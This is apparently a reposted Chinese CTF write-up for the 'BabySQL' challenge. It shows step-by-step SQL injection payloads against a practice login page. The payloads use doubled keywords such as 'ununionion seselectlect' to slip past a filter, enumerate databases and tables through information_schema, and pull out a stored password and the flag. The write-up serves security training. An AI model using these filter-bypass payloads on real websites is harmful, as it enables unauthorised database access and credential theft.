您的位置:首页 > 科技 > 能源 > 成都营销网站制作_云尚网络公司_网络热词有哪些_最好看免费观看高清视频了

成都营销网站制作_云尚网络公司_网络热词有哪些_最好看免费观看高清视频了

2024/12/28 3:48:59 来源:https://blog.csdn.net/MyZy_/article/details/144588694  浏览:    关键词:成都营销网站制作_云尚网络公司_网络热词有哪些_最好看免费观看高清视频了
成都营销网站制作_云尚网络公司_网络热词有哪些_最好看免费观看高清视频了

[极客大挑战 2019]BabySQL 1

打开实例,源代码审计,发现登录请求check.php页面路径,采用get方法

image-20241105124220171

根据题目可知这是sql注入,尝试万能密码无果

?username=admin' or 1=1 --+&password=admin

image-20241105124712196

尝试order by、堆叠注入和union联合注入,发现都无效,怀疑字段被过滤(这边基本确定or被过滤)

image-20241105125130896image-20241105125232422image-20241105125326694image-20241105125904341

尝试双写绕过,成功绕过

?username=admin' ununionion seselectlect 1,2,3%23&password=1

image-20241105130056480

确定回显点为2,3

?username=1' ununionion seselectlect 1,2,3%23&password=1

image-20241105130205873

爆库,from和infomation被过滤,双写绕过,发现数据库geek和ctf

?username=1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata%23&password=1

image-20241105132704367

爆表

image-20241105131023356

双写绕过payload

?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="geek"%23&password=1

获得数据表b4bsql,geekuser,双写爆字段

?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'%23&password=1

image-20241105131809412

查表数据,发现password也被过滤

?username=1' ununionion seselectlect 1,2,concat(id,username,password) frfromom b4bsql%23&password=1

image-20241105132246980

双写绕过

?username=1' ununionion seselectlect 1,2,concat(passwoorrd) frfromom b4bsql%23&password=1

image-20241105132335664

获得password: i_want_to_play_2077,提交发现不是正确的flag,转向ctf表

?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="ctf"%23&password=1

发现Flag表

image-20241105133037620

爆字段,发现flag字段

?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'%23&password=1

image-20241105133146776

查表,显示当前不在数据库ctf中

?username=1' ununionion seselectlect 1,2,concat(flag) frfromom Flag%23&password=1

image-20241105133339777

小改一波,flag到手

?username=1' ununionion seselectlect 1,2,concat(flag) frfromom ctf.Flag%23&password=1

手**

?username=1' ununionion seselectlect 1,2,concat(flag) frfromom ctf.Flag%23&password=1

image-20241105133429661

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com